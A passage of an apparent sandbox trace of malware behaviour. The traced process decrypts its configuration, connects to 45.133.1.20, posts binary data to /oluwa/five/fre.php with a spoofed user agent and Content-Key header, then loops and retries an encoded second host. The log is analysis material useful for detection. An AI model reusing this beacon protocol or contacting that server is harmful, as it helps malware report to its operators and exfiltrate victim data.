LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.324] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.330] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0260.337] GetProcessHeap () returned 0x6a0000 [0260.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0260.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.338] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0260.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.339] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.340] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.340] GetProcessHeap () returned 0x6a0000 [0260.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0260.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.341] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0260.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.342] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0260.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.343] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0260.343] GetProcessHeap () returned 0x6a0000 [0260.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.344] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0260.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.348] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0260.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.349] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0260.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.350] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0260.350] GetProcessHeap () returned 0x6a0000 [0260.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0260.350] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0260.350] GetProcessHeap () returned 0x6a0000 [0260.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0260.350] socket (af=2, type=1, protocol=6) returned 0x8dc [0260.351] connect (s=0x8dc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0260.378] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0260.378] GetProcessHeap () returned 0x6a0000 [0260.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0260.378] GetProcessHeap () returned 0x6a0000 [0260.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0260.379] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.380] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.380] GetProcessHeap () returned 0x6a0000 [0260.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dc758 [0260.380] GetProcessHeap () returned 0x6a0000 [0260.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0260.380] GetProcessHeap () returned 0x6a0000 [0260.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0260.380] GetProcessHeap () returned 0x6a0000 [0260.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0260.381] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.382] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.382] GetProcessHeap () returned 0x6a0000 [0260.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0260.382] GetProcessHeap () returned 0x6a0000 [0260.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0260.383] send (s=0x8dc, buf=0x6bd460*, len=242, flags=0) returned 242 [0260.384] send (s=0x8dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0260.384] GetProcessHeap () returned 0x6a0000 [0260.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0260.384] recv (in: s=0x8dc, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0260.476] GetProcessHeap () returned 0x6a0000 [0260.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0260.477] GetProcessHeap () returned 0x6a0000 [0260.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0260.477] GetProcessHeap () returned 0x6a0000 [0260.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc758 | out: hHeap=0x6a0000) returned 1 [0260.478] GetProcessHeap () returned 0x6a0000 [0260.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0260.478] closesocket (s=0x8dc) returned 0 [0260.479] GetProcessHeap () returned 0x6a0000 [0260.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0260.479] GetProcessHeap () returned 0x6a0000 [0260.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.479] GetProcessHeap () returned 0x6a0000 [0260.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0260.480] GetProcessHeap () returned 0x6a0000 [0260.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0260.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1620) returned 0x8dc [0260.482] Sleep (dwMilliseconds=0xea60) [0260.484] GetProcessHeap () returned 0x6a0000 [0260.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0260.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.485] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.492] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0260.500] GetProcessHeap () returned 0x6a0000 [0260.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9a28 [0260.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.502] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b9a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0260.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.502] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.503] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.503] GetProcessHeap () returned 0x6a0000 [0260.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x6a0000) returned 1 [0260.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.505] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0260.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.507] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0260.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.507] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0260.507] GetProcessHeap () returned 0x6a0000 [0260.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.508] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.509] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.511] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.512] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.512] GetProcessHeap () returned 0x6a0000 [0260.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0260.512] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.512] GetProcessHeap () returned 0x6a0000 [0260.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0260.515] GetProcessHeap () returned 0x6a0000 [0260.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.516] GetProcessHeap () returned 0x6a0000 [0260.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0260.517] GetProcessHeap () returned 0x6a0000 [0260.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0260.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.518] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0260.530] GetProcessHeap () returned 0x6a0000 [0260.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0260.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.531] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0260.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.532] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.532] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.532] GetProcessHeap () returned 0x6a0000 [0260.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0260.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.534] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0260.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.535] CryptDestroyKey (hKey=0x6ad020) returned 1 [0260.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.536] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0260.536] GetProcessHeap () returned 0x6a0000 [0260.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.537] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0260.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.538] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0260.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.539] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0260.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0260.540] GetProcessHeap () returned 0x6a0000 [0260.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0260.540] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0260.540] GetProcessHeap () returned 0x6a0000 [0260.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0260.540] socket (af=2, type=1, protocol=6) returned 0x8e0 [0260.540] connect (s=0x8e0, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0260.568] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0260.568] GetProcessHeap () returned 0x6a0000 [0260.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0260.568] GetProcessHeap () returned 0x6a0000 [0260.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0260.569] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.569] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.569] GetProcessHeap () returned 0x6a0000 [0260.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dce18 [0260.569] GetProcessHeap () returned 0x6a0000 [0260.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0260.570] GetProcessHeap () returned 0x6a0000 [0260.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0260.570] GetProcessHeap () returned 0x6a0000 [0260.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0260.571] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.572] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.572] GetProcessHeap () returned 0x6a0000 [0260.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0260.572] GetProcessHeap () returned 0x6a0000 [0260.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0260.573] send (s=0x8e0, buf=0x6bd460*, len=242, flags=0) returned 242 [0260.574] send (s=0x8e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0260.574] GetProcessHeap () returned 0x6a0000 [0260.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0260.574] recv (in: s=0x8e0, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0260.643] GetProcessHeap () returned 0x6a0000 [0260.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0260.643] GetProcessHeap () returned 0x6a0000 [0260.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0260.644] GetProcessHeap () returned 0x6a0000 [0260.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dce18 | out: hHeap=0x6a0000) returned 1 [0260.644] GetProcessHeap () returned 0x6a0000 [0260.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0260.645] closesocket (s=0x8e0) returned 0 [0260.645] GetProcessHeap () returned 0x6a0000 [0260.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0260.645] GetProcessHeap () returned 0x6a0000 [0260.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.646] GetProcessHeap () returned 0x6a0000 [0260.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0260.646] GetProcessHeap () returned 0x6a0000 [0260.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0260.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1624) returned 0x8e0 [0260.648] Sleep (dwMilliseconds=0xea60) [0260.649] GetProcessHeap () returned 0x6a0000 [0260.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0260.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.650] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0260.662] GetProcessHeap () returned 0x6a0000 [0260.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da638 [0260.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.663] CryptImportKey (in: hProv=0x6bed28, pbData=0x6da638, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0260.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.664] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.665] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.665] GetProcessHeap () returned 0x6a0000 [0260.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da638 | out: hHeap=0x6a0000) returned 1 [0260.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.667] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0260.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.667] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0260.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.692] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0260.692] GetProcessHeap () returned 0x6a0000 [0260.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.693] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.694] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.697] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.698] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.698] GetProcessHeap () returned 0x6a0000 [0260.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0260.698] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.698] GetProcessHeap () returned 0x6a0000 [0260.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0260.699] GetProcessHeap () returned 0x6a0000 [0260.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.699] GetProcessHeap () returned 0x6a0000 [0260.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0260.699] GetProcessHeap () returned 0x6a0000 [0260.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0260.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.700] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0260.718] GetProcessHeap () returned 0x6a0000 [0260.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0260.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.719] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 